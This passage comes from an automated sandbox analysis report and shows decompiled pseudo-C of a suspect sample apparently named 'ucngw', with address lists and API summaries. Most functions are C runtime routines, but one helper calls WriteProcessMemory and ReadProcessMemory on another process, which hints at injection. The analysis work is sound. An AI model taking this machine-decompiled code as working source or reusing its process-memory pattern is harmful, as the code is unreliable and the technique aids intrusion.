						_t60 =  *((intOrPtr*)(_t70 + 0x1001a9c0)) -  *((intOrPtr*)(_t70 + 0x1001a9bc)) + _t78;
						_v20 = _t60;
						_t62 = LocalAlloc(0x40, _t60 & 0x0000ffff);
						_v16 = _t62;
						if(_t62 != 0) {
							_v36 = _t62;
							_v44 = _v44 +  *((intOrPtr*)(0x1001a9bc +  *0x1001f2b4 * 0x7c));
							E10014010( &_v36,  &_v44, _v20 & 0x0000ffff);
							_t92 = _t92 + 4;
						}
					}
					asm("sbb eax, eax");
					E10011D50( &_v28, _t82, ( *_t82 & 0x10000000) + 0x800000);
					_t56 = _v16;
					if(_t56 != 0) {
						LocalFree(_t56);
					}
					goto L11;
				}
			}




























    0x10012ff6
    0x10012ff9
    0x10013003
    0x10013006
    0x1001300a
    0x1001300d
    0x10013012
    0x10013016
    0x1001301b
    0x1001301d
    0x10013027
    0x1001302c
    0x10013037
    0x1001303d
    0x10013041
    0x10013049
    0x10013054
    0x1001305b
    0x1001304b
    0x1001304b
    0x1001304b
    0x1001306b
    0x10013070
    0x10013078
    0x10013176
    0x1001317b
    0x1001307e
    0x10013085
    0x1001308d
    0x10013093
    0x10013097
    0x00000000
    0x00000000
    0x100130a8
    0x100130b6
    0x100130bb
    0x100130c0
    0x1001316f
    0x10013170
    0x00000000
    0x10013170
    0x100130c6
    0x100130cf
    0x100130d6
    0x100130e0
    0x100130e5
    0x100130f5
    0x100130f8
    0x10013103
    0x10013109
    0x1001310f
    0x1001311c
    0x1001312c
    0x10013134
    0x10013139
    0x10013139
    0x1001310f
    0x1001314b
    0x10013158
    0x1001315d
    0x10013166
    0x10013169
    0x10013169
    0x00000000
    0x10013166

    APIs
      • Part of subcall function 10011D50: ConvertSidToStringSidW.ADVAPI32(?,?), ref: 10011D86
      • Part of subcall function 10011D50: LocalFree.KERNEL32(?), ref: 10011FFE
      • Part of subcall function 10011D50: LocalFree.KERNEL32(?), ref: 1001200B
      • Part of subcall function 10011D50: LocalFree.KERNEL32(?), ref: 10012018
      • Part of subcall function 10011D50: LocalFree.KERNEL32(?), ref: 1001202C
    • LocalAlloc.KERNEL32(00000040,00000020), ref: 1001308D
      • Part of subcall function 10014010: SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 10014059
      • Part of subcall function 10014010: WriteFile.KERNEL32(?,?,?,?,00000000), ref: 1001407C
      • Part of subcall function 10014010: WriteProcessMemory.KERNEL32(?,1001F2D0,?,?,00000000), ref: 100140A2
      • Part of subcall function 10014010: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,?,?,?,?,10014919,000CAA50), ref: 100140B9
      • Part of subcall function 10014010: LocalFree.KERNEL32(?,10012590), ref: 100140F3
      • Part of subcall function 10014010: SetFilePointer.KERNEL32(?,?,?,?), ref: 10014120
      • Part of subcall function 10014010: ReadFile.KERNEL32(?,1001F2D0,?,?,00000000), ref: 10014140
      • Part of subcall function 10014010: ReadProcessMemory.KERNELBASE(?,?,1001F2D0,?,00000000), ref: 1001415F
    • LocalAlloc.KERNEL32(00000040,?), ref: 10013103
    • LocalFree.KERNEL32(?), ref: 10013169
    • LocalFree.KERNEL32(00000000), ref: 10013170
    Memory Dump Source
    • Source File: 00000003.00000002.1560697758.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000003.00000002.1560691498.10000000.00000040.sdmp
    • Associated: 00000003.00000002.1560720748.10015000.00000002.sdmp
    • Associated: 00000003.00000002.1560736135.1001D000.00000004.sdmp
    • Associated: 00000003.00000002.1560746871.10020000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_10000000_ucngw.jbxd
    Function 10014190, Relevance: 3.9, APIs: 3, Instructions: 152
    C-Code - Quality: 97%
    			E10014190(intOrPtr __ecx, void* __edx) {
				intOrPtr _t45;
				intOrPtr _t57;
				intOrPtr _t63;
				intOrPtr* _t65;
				void* _t68;
				intOrPtr* _t70;
				void* _t73;

				_t70 =  *((intOrPtr*)(_t73 + 0x30));
				 *((intOrPtr*)(_t73 + 0x14)) = __ecx;
				_t68 = 0;
				_t57 =  *((intOrPtr*)(_t70 + 8));
				_t65 =  *_t70;
				 *((intOrPtr*)(_t73 + 0x20)) = 0;
				 *((intOrPtr*)(_t73 + 0x24)) = 0x1001f2d0;
				 *((intOrPtr*)(_t73 + 0x28)) = _t57;
				_t63 = _t65 + _t57;
				 *((intOrPtr*)(_t73 + 0x2c)) = 0;
				 *((intOrPtr*)(_t73 + 0x1c)) = _t63;
				if( *((intOrPtr*)( *((intOrPtr*)(__ecx + 4)))) != 0) {
					L25:
					_t42 =  !=  ?  *((intOrPtr*)(_t73 + 0x38)) : 0;
					 *((intOrPtr*)(_t70 + 0xc)) =  !=  ?  *((intOrPtr*)(_t73 + 0x38)) : 0;
					return _t68;
				} else {
					_t45 =  *((intOrPtr*)( *((intOrPtr*)(_t70 + 4))));
					if(_t45 > 6) {
						goto L25;
					} else {
						switch( *((intOrPtr*)(( *(_t45 + 0x10014328) & 0x000000ff) * 4 +  &M1001431C))) {
							case 0:
								_t71 = __edx;
								_t55 = _t65 + __edx;
								while(_t55 <= _t63) {
									_t69 = _t65;
									_t64 =  *((intOrPtr*)( *((intOrPtr*)(_t73 + 0x14))));
									_t52 = _t71 - 4;
									if(_t52 < 0) {
										L8:
										if(_t52 == 0xfffffffc) {
											goto L17;
										} else {
											goto L9;
										}
									} else {
										while( *_t64 ==  *_t69) {
											_t64 = _t64 + 4;
											_t69 = _t69 + 4;
											_t52 = _t52 - 4;
											if(_t52 >= 0) {
												continue;
											} else {
												goto L8;
											}
											goto L18;
										}
										L9:
										if( *_t64 !=  *_t69) {
											L16:
											_t68 = 0;
										} else {
											if(_t52 == 0xfffffffd) {
												L17:
												_t68 = 1;
											} else {
												_t18 = _t69 + 1; // 0x1001e3
												if( *((intOrPtr*)(_t64 + 1)) !=  *_t18) {
													goto L16;
												} else {
													if(_t52 == 0xfffffffe) {
														goto L17;
													} else {
														_t20 = _t69 + 2; // 0x1001
														if( *((intOrPtr*)(_t64 + 2)) !=  *_t20) {
															goto L16;
														} else {
															if(_t52 == 0xffffffff) {
																goto L17;
															} else {
																_t22 = _t69 + 3; // 0x8000010
																if( *((intOrPtr*)(_t64 + 3)) ==  *_t22) {
																	goto L17;
																} else {
																	goto L16;
																}
															}
														}
													}
												}
											}
										}
									}
									L18:
									_t63 =  *((intOrPtr*)(_t73 + 0x1c));
									_t65 = _t65 + 1;
									_t55 = _t55 + 1;
									if(_t68 == 0) {
										continue;
									}
									break;
								}
								_t48 =  !=  ? _t65 - 1 : 0;
								 *((intOrPtr*)( *((intOrPtr*)(_t73 + 0x38)) + 0xc)) =  !=  ? _t65 - 1 : 0;
								return _t68;
								goto L26;
							case 1:
								__eax = LocalAlloc(0x40, __ecx); // executed
								 *(__esp + 0x20) = __eax;
								if(__eax == 0) {
									goto L25;
								} else {
									__edx = __ebp;
									__ecx = __esp + 0x24;
									if(E10014010(__esp + 0x24, __ebp,  *((intOrPtr*)(__ebp + 8))) == 0) {
										L24:
										__eax =  *(__esp + 0x20);
										__edi =  *((intOrPtr*)(__esp + 0x38));
										LocalFree( *(__esp + 0x20)) = 0;
										__eax =  !=  ? __edi : 0;
										 *((intOrPtr*)(__ebp + 0xc)) =  !=  ? __edi : 0;
										__eax = __esi;
										return __esi;
									} else {
										__ecx =  *(__esp + 0x14);
										__eax = __esp + 0x20;
										_push(0);
										_push(__eax);
										__edx = __ebx;
										__esi = E10014190(__ecx, __ebx);
										__esp = __esp + 8;
										if(__esi == 0) {
											goto L24;
										} else {
											__edi =  *__ebp;
											__eax =  *(__esp + 0x20);
											__edi =  *__ebp - __eax;
											__edi =  *__ebp - __eax +  *((intOrPtr*)(__esp + 0x2c));
											__eax = GlobalFree(__eax); // executed
											0 =  !=  ? __edi : 0;
											 *((intOrPtr*)(__ebp + 0xc)) =  !=  ? __edi : 0;
											__eax = __esi;
											return __esi;
										}
									}
								}
								goto L26;
							case 2:
								goto L25;
						}
					}
				}
				L26:
			}










    0x10014195
    0x1001419d
    0x100141a1
    0x100141a3
    0x100141a8
    0x100141ae
    0x100141b2
    0x100141ba
    0x100141be
    0x100141c1
    0x100141c5
    0x100141cb
    0x10014304
    0x1001430c
    0x10014310
    0x1001431b
    0x100141d1
    0x100141d4
    0x100141d9
    0x00000000
    0x100141df
    0x100141e6
    0x00000000
    0x100141ed
    0x100141ef
    0x100141f2
    0x100141fa
    0x100141fc
    0x10014200
    0x10014203
    0x10014216
    0x10014219
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x10014205
    0x10014205
    0x1001420b
    0x1001420e
    0x10014211
    0x10014214
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x10014214
    0x1001421b
    0x1001421f
    0x10014248
    0x10014248
    0x10014221
    0x10014224
    0x1001424c
    0x1001424c
    0x10014226
    0x10014229
    0x1001422c
    0x00000000
    0x1001422e
    0x10014231
    0x00000000
    0x10014233
    0x10014236
    0x10014239
    0x00000000
    0x1001423b
    0x1001423e
    0x00000000
    0x10014240
    0x10014243
    0x10014246
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x10014246
    0x1001423e
    0x10014239
    0x10014231
    0x1001422c
    0x10014224
    0x1001421f
    0x10014251
    0x10014251
    0x10014255
    0x10014256
    0x10014259
    0x00000000
    0x00000000
    0x00000000
    0x10014259
    0x10014264
    0x10014267
    0x10014273
    0x00000000
    0x00000000
    0x10014277
    0x1001427d
    0x10014283
    0x00000000
    0x10014289
    0x1001428c
    0x1001428e
    0x1001429c
    0x100142e1
    0x100142e1
    0x100142e5
    0x100142f0
    0x100142f4
    0x100142f7
    0x100142fa
    0x10014303
    0x1001429e
    0x1001429e
    0x100142a2
    0x100142a6
    0x100142a8
    0x100142a9
    0x100142b0
    0x100142b2
    0x100142b7
    0x00000000
    0x100142b9
    0x100142b9
    0x100142bc
    0x100142c0
    0x100142c2
    0x100142c7
    0x100142d1
    0x100142d4
    0x100142d7
    0x100142e0
    0x100142e0
    0x100142b7
    0x1001429c
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x100141e6
    0x100141d9
    0x00000000

    APIs
    • LocalAlloc.KERNELBASE(00000040,00001001,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 10014277
      • Part of subcall function 10014010: SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 10014059
      • Part of subcall function 10014010: WriteFile.KERNEL32(?,?,?,?,00000000), ref: 1001407C
      • Part of subcall function 10014010: WriteProcessMemory.KERNEL32(?,1001F2D0,?,?,00000000), ref: 100140A2
      • Part of subcall function 10014010: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,?,?,?,?,10014919,000CAA50), ref: 100140B9
      • Part of subcall function 10014010: LocalFree.KERNEL32(?,10012590), ref: 100140F3
      • Part of subcall function 10014010: SetFilePointer.KERNEL32(?,?,?,?), ref: 10014120
      • Part of subcall function 10014010: ReadFile.KERNEL32(?,1001F2D0,?,?,00000000), ref: 10014140
      • Part of subcall function 10014010: ReadProcessMemory.KERNELBASE(?,?,1001F2D0,?,00000000), ref: 1001415F
    • LocalFree.KERNEL32(?,00001DB1), ref: 100142EA
      • Part of subcall function 10014190: GlobalFree.KERNELBASE(?,?,?,00001DB1), ref: 100142C7
    Memory Dump Source
    • Source File: 00000003.00000002.1560697758.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000003.00000002.1560691498.10000000.00000040.sdmp
    • Associated: 00000003.00000002.1560720748.10015000.00000002.sdmp
    • Associated: 00000003.00000002.1560736135.1001D000.00000004.sdmp
    • Associated: 00000003.00000002.1560746871.10020000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_10000000_ucngw.jbxd
    Function 00C58A8F, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132
    C-Code - Quality: 96%
    			E00C58A8F(signed int __edx, intOrPtr _a4) {
				signed int _v8;
				char _v264;
				char _v520;
				char _v776;
				char _v1800;
				char _v1814;
				struct _cpinfo _v1820;
				intOrPtr _v1824;
				signed int _v1828;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t63;
				void* _t67;
				signed int _t68;
				intOrPtr _t69;
				void* _t72;
				char _t73;
				char _t74;
				signed char _t75;
				signed int _t76;
				signed char _t86;
				char _t87;
				char _t89;
				signed int _t92;
				signed int _t93;
				signed int _t94;
				void* _t95;
				char* _t96;
				intOrPtr _t98;
				signed int _t99;

				_t94 = __edx;
				_t63 =  *0xc6a004; // 0x26d30358
				_v8 = _t63 ^ _t99;
				_t98 = _a4;
				if(GetCPInfo( *(_t98 + 4),  &_v1820) == 0) {
					_t95 = _t98 + 0x119;
					_t89 = 0;
					_t67 = 0xffffff9f;
					_t68 = _t67 - _t95;
					__eflags = _t68;
					_v1828 = _t68;
					do {
						_t96 = _t95 + _t89;
						_t69 = _t68 + _t96;
						_v1824 = _t69;
						__eflags = _t69 + 0x20 - 0x19;
						if(_t69 + 0x20 > 0x19) {
							__eflags = _v1824 - 0x19;
							if(_v1824 > 0x19) {
								 *_t96 = 0;
							} else {
								_t72 = _t98 + _t89;
								_t57 = _t72 + 0x19;
								 *_t57 =  *(_t72 + 0x19) | 0x00000020;
								__eflags =  *_t57;
								_t59 = _t89 - 0x20; // -32
								_t73 = _t59;
								goto L24;
							}
						} else {
							 *(_t98 + _t89 + 0x19) =  *(_t98 + _t89 + 0x19) | 0x00000010;
							_t54 = _t89 + 0x20; // 0x20
							_t73 = _t54;
							L24:
							 *_t96 = _t73;
						}
						_t68 = _v1828;
						_t95 = _t98 + 0x119;
						_t89 = _t89 + 1;
						__eflags = _t89 - 0x100;
					} while (_t89 < 0x100);
				} else {
					_t74 = 0;
					do {
						 *((char*)(_t99 + _t74 - 0x104)) = _t74;
						_t74 = _t74 + 1;
					} while (_t74 < 0x100);
					_t75 = _v1814;
					_t92 =  &_v1814;
					_v264 = 0x20;
					while(1) {
						_t105 = _t75;
						if(_t75 == 0) {
							break;
						}
						_t94 =  *(_t92 + 1) & 0x000000ff;
						_t76 = _t75 & 0x000000ff;
						while(1) {
							__eflags = _t76 - _t94;
							if(_t76 > _t94) {
								break;
							}
							__eflags = _t76 - 0x100;
							if(_t76 < 0x100) {
								 *((char*)(_t99 + _t76 - 0x104)) = 0x20;
								_t76 = _t76 + 1;
								__eflags = _t76;
								continue;
							}
							break;
						}
						_t92 = _t92 + 2;
						__eflags = _t92;
						_t75 =  *_t92;
					}
					E00C59A8A(_t94, _t105, 0, 1,  &_v264, 0x100,  &_v1800,  *(_t98 + 4), 0);
					E00C5BC1C(0, _t105, 0,  *((intOrPtr*)(_t98 + 0x21c)), 0x100,  &_v264, 0x100,  &_v520, 0x100,  *(_t98 + 4), 0); // executed
					E00C5BC1C(0, _t105, 0,  *((intOrPtr*)(_t98 + 0x21c)), 0x200,  &_v264, 0x100,  &_v776, 0x100,  *(_t98 + 4), 0);
					_t93 = 0;
					do {
						_t86 =  *(_t99 + _t93 * 2 - 0x704) & 0x0000ffff;
						if((_t86 & 0x00000001) == 0) {
							__eflags = _t86 & 0x00000002;
							if((_t86 & 0x00000002) == 0) {
								 *((char*)(_t98 + _t93 + 0x119)) = 0;
							} else {
								_t37 = _t98 + _t93 + 0x19;
								 *_t37 =  *(_t98 + _t93 + 0x19) | 0x00000020;
								__eflags =  *_t37;
								_t87 =  *((intOrPtr*)(_t99 + _t93 - 0x304));
								goto L15;
							}
						} else {
							 *(_t98 + _t93 + 0x19) =  *(_t98 + _t93 + 0x19) | 0x00000010;
							_t87 =  *((intOrPtr*)(_t99 + _t93 - 0x204));
							L15:
							 *((char*)(_t98 + _t93 + 0x119)) = _t87;
						}
						_t93 = _t93 + 1;
					} while (_t93 < 0x100);
				}
				return E00C51252(0, _v8 ^ _t99, 0x100, _t98);
			}


































    0x00c58a8f
    0x00c58a9a
    0x00c58aa1
    0x00c58aa6
    0x00c58ac3
    0x00c58bbb
    0x00c58bc1
    0x00c58bc3
    0x00c58bc4
    0x00c58bc4
    0x00c58bc6
    0x00c58bcc
    0x00c58bcc
    0x00c58bce
    0x00c58bd0
    0x00c58bd9
    0x00c58bdc
    0x00c58be8
    0x00c58bef
    0x00c58bff
    0x00c58bf1
    0x00c58bf1
    0x00c58bf4
    0x00c58bf4
    0x00c58bf4
    0x00c58bf8
    0x00c58bf8
    0x00000000
    0x00c58bf8
    0x00c58bde
    0x00c58bde
    0x00c58be3
    0x00c58be3
    0x00c58bfb
    0x00c58bfb
    0x00c58bfb
    0x00c58c01
    0x00c58c07
    0x00c58c0d
    0x00c58c0e
    0x00c58c0e
    0x00c58ac9
    0x00c58ac9
    0x00c58acb
    0x00c58acb
    0x00c58ad2
    0x00c58ad3
    0x00c58ad7
    0x00c58add
    0x00c58ae3
    0x00c58b0b
    0x00c58b0b
    0x00c58b0d
    0x00000000
    0x00000000
    0x00c58aec
    0x00c58af0
    0x00c58b02
    0x00c58b02
    0x00c58b04
    0x00000000
    0x00000000
    0x00c58af5
    0x00c58af7
    0x00c58af9
    0x00c58b01
    0x00c58b01
    0x00000000
    0x00c58b01
    0x00000000
    0x00c58af7
    0x00c58b06
    0x00c58b06
    0x00c58b09
    0x00c58b09
    0x00c58b25
    0x00c58b46
    0x00c58b6e
    0x00c58b76
    0x00c58b78
    0x00c58b78
    0x00c58b82
    0x00c58b92
    0x00c58b94
    0x00c58bab
    0x00c58b96
    0x00c58b96
    0x00c58b96
    0x00c58b96
    0x00c58b9b
    0x00000000
    0x00c58b9b
    0x00c58b84
    0x00c58b84
    0x00c58b89
    0x00c58ba2
    0x00c58ba2
    0x00c58ba2
    0x00c58bb2
    0x00c58bb3
    0x00c58bb7
    0x00c58c22

    APIs
    • GetCPInfo.KERNEL32(?,?), ref: 00C58AB4
      • Part of subcall function 00C59A8A: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,?,00000100,?,00000000,?,?,00000000), ref: 00C59AD7
      • Part of subcall function 00C59A8A: MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00C59B60
      • Part of subcall function 00C59A8A: GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00C59B72
      • Part of subcall function 00C59A8A: __freea.LIBCMT ref: 00C59B7B
      • Part of subcall function 00C51252: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00C514FE
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.1560617479.00C51000.00000020.sdmp, Offset: 00C50000, based on PE: true
    • Associated: 00000003.00000002.1560609893.00C50000.00000002.sdmp
    • Associated: 00000003.00000002.1560640058.00C63000.00000002.sdmp
    • Associated: 00000003.00000002.1560651102.00C6A000.00000004.sdmp
    • Associated: 00000003.00000002.1560658398.00C6C000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_c50000_ucngw.jbxd
    Function 10009437, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132
    C-Code - Quality: 96%
    			E10009437(void* __ebx, signed int __edx, void* __edi, void* __esi, intOrPtr _a4) {
				signed int _v8;
				char _v264;
				char _v520;
				char _v776;
				char _v1800;
				char _v1814;
				struct _cpinfo _v1820;
				intOrPtr _v1824;
				signed int _v1828;
				signed int _t63;
				void* _t67;
				signed int _t68;
				intOrPtr _t69;
				void* _t72;
				char _t73;
				char _t74;
				signed char _t75;
				signed int _t76;
				signed char _t86;
				char _t87;
				char _t90;
				signed int _t93;
				signed int _t94;
				signed int _t95;
				void* _t96;
				char* _t97;
				intOrPtr _t101;
				signed int _t102;

				_t95 = __edx;
				_t63 =  *0x1001d018; // 0x26c1db24
				_v8 = _t63 ^ _t102;
				_t101 = _a4;
				_t4 = _t101 + 4; // 0x5efc4d8b
				if(GetCPInfo( *_t4,  &_v1820) == 0) {
					_t47 = _t101 + 0x119; // 0x10009a82
					_t96 = _t47;
					_t90 = 0;
					_t67 = 0xffffff9f;
					_t68 = _t67 - _t96;
					__eflags = _t68;
					_v1828 = _t68;
					do {
						_t97 = _t96 + _t90;
						_t69 = _t68 + _t97;
						_v1824 = _t69;
						__eflags = _t69 + 0x20 - 0x19;
						if(_t69 + 0x20 > 0x19) {
							__eflags = _v1824 - 0x19;
							if(_v1824 > 0x19) {
								 *_t97 = 0;
							} else {
								_t72 = _t101 + _t90;
								_t57 = _t72 + 0x19;
								 *_t57 =  *(_t72 + 0x19) | 0x00000020;
								__eflags =  *_t57;
								_t59 = _t90 - 0x20; // -32
								_t73 = _t59;
								goto L24;
							}
						} else {
							 *(_t101 + _t90 + 0x19) =  *(_t101 + _t90 + 0x19) | 0x00000010;
							_t54 = _t90 + 0x20; // 0x20
							_t73 = _t54;
							L24:
							 *_t97 = _t73;
						}
						_t68 = _v1828;
						_t61 = _t101 + 0x119; // 0x10009a82
						_t96 = _t61;
						_t90 = _t90 + 1;
						__eflags = _t90 - 0x100;
					} while (_t90 < 0x100);
				} else {
					_t74 = 0;
					do {
						 *((char*)(_t102 + _t74 - 0x104)) = _t74;
						_t74 = _t74 + 1;
					} while (_t74 < 0x100);
					_t75 = _v1814;
					_t93 =  &_v1814;
					_v264 = 0x20;
					while(1) {
						_t108 = _t75;
						if(_t75 == 0) {
							break;
						}
						_t95 =  *(_t93 + 1) & 0x000000ff;
						_t76 = _t75 & 0x000000ff;
						while(1) {
							__eflags = _t76 - _t95;
							if(_t76 > _t95) {
								break;
							}
							__eflags = _t76 - 0x100;
							if(_t76 < 0x100) {
								 *((char*)(_t102 + _t76 - 0x104)) = 0x20;
								_t76 = _t76 + 1;
								__eflags = _t76;
								continue;
							}
							break;
						}
						_t93 = _t93 + 2;
						__eflags = _t93;
						_t75 =  *_t93;
					}
					_t13 = _t101 + 4; // 0x5efc4d8b
					E1000D0F4(0, _t95, 0x100, _t101, _t108, 0, 1,  &_v264, 0x100,  &_v1800,  *_t13, 0);
					_t16 = _t101 + 4; // 0x5efc4d8b
					_t19 = _t101 + 0x21c; // 0x874c084
					E1000B13C(0x100, _t101, _t108, 0,  *_t19, 0x100,  &_v264, 0x100,  &_v520, 0x100,  *_t16, 0); // executed
					_t21 = _t101 + 4; // 0x5efc4d8b
					_t23 = _t101 + 0x21c; // 0x874c084
					E1000B13C(0x100, _t101, _t108, 0,  *_t23, 0x200,  &_v264, 0x100,  &_v776, 0x100,  *_t21, 0);
					_t94 = 0;
					do {
						_t86 =  *(_t102 + _t94 * 2 - 0x704) & 0x0000ffff;
						if((_t86 & 0x00000001) == 0) {
							__eflags = _t86 & 0x00000002;
							if((_t86 & 0x00000002) == 0) {
								 *((char*)(_t101 + _t94 + 0x119)) = 0;
							} else {
								_t37 = _t101 + _t94 + 0x19;
								 *_t37 =  *(_t101 + _t94 + 0x19) | 0x00000020;
								__eflags =  *_t37;
								_t87 =  *((intOrPtr*)(_t102 + _t94 - 0x304));
								goto L15;
							}
						} else {
							 *(_t101 + _t94 + 0x19) =  *(_t101 + _t94 + 0x19) | 0x00000010;
							_t87 =  *((intOrPtr*)(_t102 + _t94 - 0x204));
							L15:
							 *((char*)(_t101 + _t94 + 0x119)) = _t87;
						}
						_t94 = _t94 + 1;
					} while (_t94 < 0x100);
				}
				return E10001B26(_v8 ^ _t102);
			}































    0x10009437
    0x10009442
    0x10009449
    0x1000944e
    0x10009459
    0x1000946b
    0x10009563
    0x10009563
    0x10009569
    0x1000956b
    0x1000956c
    0x1000956c
    0x1000956e
    0x10009574
    0x10009574
    0x10009576
    0x10009578
    0x10009581
    0x10009584
    0x10009590
    0x10009597
    0x100095a7
    0x10009599
    0x10009599
    0x1000959c
    0x1000959c
    0x1000959c
    0x100095a0
    0x100095a0
    0x00000000
    0x100095a0
    0x10009586
    0x10009586
    0x1000958b
    0x1000958b
    0x100095a3
    0x100095a3
    0x100095a3
    0x100095a9
    0x100095af
    0x100095af
    0x100095b5
    0x100095b6
    0x100095b6
    0x10009471
    0x10009471
    0x10009473
    0x10009473
    0x1000947a
    0x1000947b
    0x1000947f
    0x10009485
    0x1000948b
    0x100094b3
    0x100094b3
    0x100094b5
    0x00000000
    0x00000000
    0x10009494
    0x10009498
    0x100094aa
    0x100094aa
    0x100094ac
    0x00000000
    0x00000000
    0x1000949d
    0x1000949f
    0x100094a1
    0x100094a9
    0x100094a9
    0x00000000
    0x100094a9
    0x00000000
    0x1000949f
    0x100094ae
    0x100094ae
    0x100094b1
    0x100094b1
    0x100094b8
    0x100094cd
    0x100094d3
    0x100094e7
    0x100094ee
    0x100094fd
    0x1000950f
    0x10009516
    0x1000951e
    0x10009520
    0x10009520
    0x1000952a
    0x1000953a
    0x1000953c
    0x10009553
    0x1000953e
    0x1000953e
    0x1000953e
    0x1000953e
    0x10009543
    0x00000000
    0x10009543
    0x1000952c
    0x1000952c
    0x10009531
    0x1000954a
    0x1000954a
    0x1000954a
    0x1000955a
    0x1000955b
    0x1000955f
    0x100095ca

    APIs
    • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 1000945C
      • Part of subcall function 1000D0F4: MultiByteToWideChar.KERNEL32(?,00000000,1BE85006,100031C9,00000000,00000000,1000405A,00000000,1000405A,?,00000001,100031C9,1BE85006,00000001,1000405A,1000405A), ref: 1000D141
      • Part of subcall function 1000D0F4: __alloca_probe_16.NTDLLP ref: 1000D179
      • Part of subcall function 1000D0F4: MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 1000D1CA
      • Part of subcall function 1000D0F4: GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 1000D1DC
      • Part of subcall function 1000D0F4: __freea.LIBCMT ref: 1000D1E5
      • Part of subcall function 10001B26: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 10001B6A
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.1560697758.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000003.00000002.1560691498.10000000.00000040.sdmp
    • Associated: 00000003.00000002.1560720748.10015000.00000002.sdmp
    • Associated: 00000003.00000002.1560736135.1001D000.00000004.sdmp
    • Associated: 00000003.00000002.1560746871.10020000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_10000000_ucngw.jbxd
    Function 00C59349, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47
    C-Code - Quality: 34%
    			E00C59349(void* __ebx, void* __ecx, void* __edi, void* __eflags, intOrPtr _a4, int _a8, short* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36) {
				signed int _v8;
				void* __esi;
				signed int _t18;
				intOrPtr* _t20;
				intOrPtr* _t33;
				void* _t34;
				signed int _t35;

				_t31 = __edi;
				_t27 = __ecx;
				_t26 = __ebx;
				_push(__ecx);
				_t18 =  *0xc6a004; // 0x26d30358
				_v8 = _t18 ^ _t35;
				_t20 = E00C59075(0x16, "LCMapStringEx", 0xc6477c, "LCMapStringEx"); // executed
				_t33 = _t20;
				if(_t33 == 0) {
					LCMapStringW(E00C593D1(__ebx, _t27, __edi, __eflags, _a4, 0), _a8, _a12, _a16, _a20, _a24);
				} else {
					 *0xc63148(_a4, _a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36);
					 *_t33();
				}
				_pop(_t34);
				return E00C51252(_t26, _v8 ^ _t35, _t31, _t34);
			}










    0x00c59349
    0x00c59349
    0x00c59349
    0x00c5934e
    0x00c5934f
    0x00c59356
    0x00c5936b
    0x00c59370
    0x00c59377
    0x00c593ba
    0x00c59379
    0x00c59396
    0x00c5939c
    0x00c5939c
    0x00c593c5
    0x00c593ce

    APIs
      • Part of subcall function 00C59075: GetProcAddress.KERNEL32(00000000,?,00000000,00000000,00000000,?,00C592B5,00000006,FlsSetValue,00C64750,00C64758,00000000,00000364,?,00C58072,00000000), ref: 00C590D5
    • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 00C593BA
      • Part of subcall function 00C51252: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00C514FE
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.1560617479.00C51000.00000020.sdmp, Offset: 00C50000, based on PE: true
    • Associated: 00000003.00000002.1560609893.00C50000.00000002.sdmp
    • Associated: 00000003.00000002.1560640058.00C63000.00000002.sdmp
    • Associated: 00000003.00000002.1560651102.00C6A000.00000004.sdmp
    • Associated: 00000003.00000002.1560658398.00C6C000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_c50000_ucngw.jbxd
    Function 10006B9A, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47
    C-Code - Quality: 30%
    			E10006B9A(void* __ecx, void* __esi, void* __eflags, intOrPtr _a4, int _a8, short* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36) {
				signed int _v8;
				signed int _t18;
				intOrPtr* _t20;
				intOrPtr* _t31;
				signed int _t33;

				_t26 = __ecx;
				_push(__ecx);
				_t18 =  *0x1001d018; // 0x26c1db24
				_v8 = _t18 ^ _t33;
				_push(__esi);
				_t20 = E100068C6(0x16, "LCMapStringEx", 0x10016c3c, "LCMapStringEx"); // executed
				_t31 = _t20;
				if(_t31 == 0) {
					LCMapStringW(E10006C22(_t26, _t31, __eflags, _a4, 0), _a8, _a12, _a16, _a20, _a24);
				} else {
					 *0x10015138(_a4, _a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36);
					 *_t31();
				}
				return E10001B26(_v8 ^ _t33);
			}








    0x10006b9a
    0x10006b9f
    0x10006ba0
    0x10006ba7
    0x10006baa
    0x10006bbc
    0x10006bc1
    0x10006bc8
    0x10006c0b
    0x10006bca
    0x10006be7
